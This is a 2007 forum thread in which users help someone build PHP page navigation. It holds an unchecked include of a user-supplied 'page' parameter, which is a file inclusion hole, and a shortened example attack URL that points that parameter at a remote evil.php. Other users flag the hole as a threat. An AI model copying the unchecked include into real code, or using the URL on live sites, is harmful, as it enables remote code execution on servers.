PHP question

johnisevil · 2007-01-06 23:15:54

I'm using the following PHP code to handle navigation on a site I'm designing:

  $pages = array('clients', 'contact', 'informationservices', 'portfolio', 'thankyou');
  if(in_array($_GET['page'], $pages)) {
    @ require_once($_GET['page'].'.php');
  }
  elseif(!isset($_GET['page'])) {
    @ require_once('informationservices.php');
  }

How would I make it so that instead of having to manually list the pages used on the site in the pages array, I could automatically have PHP figure out what .php files are in $DOCUMENT_ROOT and have them inserted into the array?

rab · 2007-01-06 23:57:16

function dir_files_to_array( $path = './' ) {
    $nocount = array( "secretfile.php", "my_porn.txt" );
    $files = array();
    
    if( $handle = opendir($path) )
        while( false !== ($file = readdir($handle)) )
            if( !in_array($file, $nocount) && !is_dir($file) )
                $files[] = $file;
                    
   closedir($handle);

return $files;
}

print_r(dir_files_to_array()); print "n";

johnisevil · 2007-01-07 16:14:42

The solution was so easy that it's almost stupid. I changed what I pasted above to the following:

if($_GET['page']) {
    @ require_once($_GET['page'].'.php');
  }
  elseif(!isset($_GET['page'])) {
    @ require_once('informationservices.php');
  }

RedShift · 2007-01-07 16:19:23

This poses a security threat, you were better off with your first code, it checks if file x is allowed to be included.

rab · 2007-01-07 21:33:00

johnisevil wrote:

The solution was so easy that it's almost stupid. I changed what I pasted above to the following:
if($_GET['page']) {
    @ require_once($_GET['page'].'.php');
  }
  elseif(!isset($_GET['page'])) {
    @ require_once('informationservices.php');
  }

http://hackme.org/index.php?page=http:/ … t/evil.php?

Use the function I posted...

johnisevil · 2007-01-07 22:38:43

RedShift wrote:

This poses a security threat, you were better off with your first code, it checks if file x is allowed to be included.

Is there a way where I could make it ignore certain files that I don't want to be accessed?

RedShift · 2007-01-07 22:41:14

johnisevil wrote:

RedShift wrote:
This poses a security threat, you were better off with your first code, it checks if file x is allowed to be included.
Is there a way where I could make it ignore certain files that I don't want to be accessed?

Have a look at rab's code.

rab · 2007-01-07 23:40:26

function dir_files_to_array( $path = './' ) { 
    $noinclude = array( "secretfile.php", "my_porn.txt" ); 
    // Files in this array  will not be returned
    $files = array(); 
     
    if( $handle = opendir($path) ) 
       while( false !== ($file = readdir($handle)) ) 
          if( !in_array($file, $noinclude) && preg_match("/.php$/",$file) ) 
             $files[] = $file; 
                 
    closedir($handle); 
 
 return $files; 
 } 
 

if( in_array($_GET['page'], dir_files_to_array()) )
    include $_GET['page'];
else 
    include "index.php";

Example usage

Arch Linux

#1 2007-01-06 23:15:54

PHP question

#2 2007-01-06 23:57:16

Re: PHP question

#3 2007-01-07 16:14:42

Re: PHP question

#4 2007-01-07 16:19:23

Re: PHP question

#5 2007-01-07 21:33:00

Re: PHP question

#6 2007-01-07 22:38:43

Re: PHP question

#7 2007-01-07 22:41:14

Re: PHP question

#8 2007-01-07 23:40:26

Re: PHP question

Board footer